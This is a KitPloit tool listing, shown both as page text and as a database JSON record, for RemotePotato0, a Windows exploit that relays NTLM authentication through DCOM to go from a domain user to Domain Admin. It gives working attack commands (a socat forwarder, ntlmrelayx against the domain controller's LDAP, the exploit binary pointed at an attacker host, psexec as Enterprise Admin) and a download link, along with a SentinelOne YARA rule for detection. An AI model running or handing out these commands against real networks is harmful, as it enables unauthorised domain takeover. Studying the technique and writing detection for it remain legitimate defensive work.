RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin

2021-07-11T21:30:00

Description

[![](https://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/w640-h336/RemotePotato0_1_demo-709924.gif)](<https://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/s1600/RemotePotato0_1_demo-709924.gif>) Just another "Won't Fix" [Windows Privilege Escalation](<https://www.kitploit.com/search/label/Windows%20Privilege%20Escalation> "Windows Privilege Escalation" ) from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin. Briefly: It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol [relay](<https://www.kitploit.com/search/label/Relay> "relay" ) server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. Full details at --> <https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop> **Example** Attacker machine (192.168.83.130): sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 Victim machine (192.168.83.131): .\RemotePotato0.exe -r 192.168.83.130 -p 9998 Victim Domain Controller (192.168.83.135) Enjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;) psexec.py 'SPLINTER/winrm_user_1:[email protected]' **Demo** [![](https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/w640-h334/RemotePotato0_1_demo.gif)](<https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/s1920/RemotePotato0_1_demo.gif>) **Detection** Yara rule to detect RemotePotato0 binary: rule SentinelOne_RemotePotato0_privesc { meta: author = "SentinelOne" description = "Detects RemotePotato0 binary" reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop" strings: $import1 = "CoGetInstanceFromIStorage" $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii $meow_header = { 4d 45 4f 57 } $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii condition: (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*) } **Authors** * [Antonio Cocomazzi](<https://twitter.com/splinter_code> "Antonio Cocomazzi" ) * [Andrea Pierini](<https://twitter.com/decoder_it> "Andrea Pierini" ) **Credits** * [Impacket](<https://github.com/SecureAuthCorp/impacket> "Impacket" ) **[Download RemotePotato0](<https://github.com/antonioCoco/RemotePotato0> "Download RemotePotato0" )**

{"id": "KITPLOIT:529188716472449131", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "RemotePotato0 - Just Another \"Won't Fix\" Windows Privilege Escalation From User To Domain Admin", "description": "[![](https://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/w640-h336/RemotePotato0_1_demo-709924.gif)](<https://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/s1600/RemotePotato0_1_demo-709924.gif>)\n\n \n\n\nJust another \"Won't Fix\" [Windows Privilege Escalation](<https://www.kitploit.com/search/label/Windows%20Privilege%20Escalation> \"Windows Privilege Escalation\" ) from User to Domain Admin.\n\nRemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.\n\nBriefly:\n\nIt abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol [relay](<https://www.kitploit.com/search/label/Relay> \"relay\" ) server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.\n\nFull details at --> <https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop>\n\n \n\n\n**Example** \n\n\nAttacker machine (192.168.83.130):\n \n \n sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & \n sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 \n \n\nVictim machine (192.168.83.131):\n \n \n .\\RemotePotato0.exe -r 192.168.83.130 -p 9998 \n \n\nVictim Domain Controller (192.168.83.135)\n\nEnjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;)\n \n \n psexec.py 'SPLINTER/winrm_user_1:[email\u00a0protected]' \n \n\n \n**Demo** \n\n\n \n\n\n[![](https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/w640-h334/RemotePotato0_1_demo.gif)](<https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/s1920/RemotePotato0_1_demo.gif>)\n\n \n\n\n**Detection** \n\n\nYara rule to detect RemotePotato0 binary:\n \n \n rule SentinelOne_RemotePotato0_privesc { \n meta: \n author = \"SentinelOne\" \n description = \"Detects RemotePotato0 binary\" \n reference = \"https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop\" \n \n strings: \n $import1 = \"CoGetInstanceFromIStorage\" \n $istorage_clsid = \"{00000306-0000-0000-c000-000000000046}\" nocase wide ascii \n $meow_header = { 4d 45 4f 57 } \n $clsid1 = \"{11111111-2222-3333-4444-555555555555}\" nocase wide ascii \n $clsid2 = \"{5167B42F-C111-47A1-ACC4-8EABE61B0B54}\" nocase wide ascii \n \n condition: \n (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*) \n } \n \n\n \n**Authors** \n\n\n * [Antonio Cocomazzi](<https://twitter.com/splinter_code> \"Antonio Cocomazzi\" )\n * [Andrea Pierini](<https://twitter.com/decoder_it> \"Andrea Pierini\" )\n \n**Credits** \n\n\n * [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" )\n \n \n\n\n**[Download RemotePotato0](<https://github.com/antonioCoco/RemotePotato0> \"Download RemotePotato0\" )**\n", "published": "2021-07-11T21:30:00", "modified": "2021-07-11T21:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2021/07/remotepotato0-just-another-wont-fix.html", "reporter": "KitPloit", "references": ["https://github.com/antonioCoco/RemotePotato0", "https://github.com/SecureAuthCorp/impacket"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:01:50", "viewCount": 84, "enchantments": {"dependencies": {}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "_state": {"dependencies": 1659909890, "score": 1659846169}, "_internal": {"score_hash": "7aa92dbc61d16a5c3b64558b98cbfa0b"}, "toolHref": "https://github.com/antonioCoco/RemotePotato0"}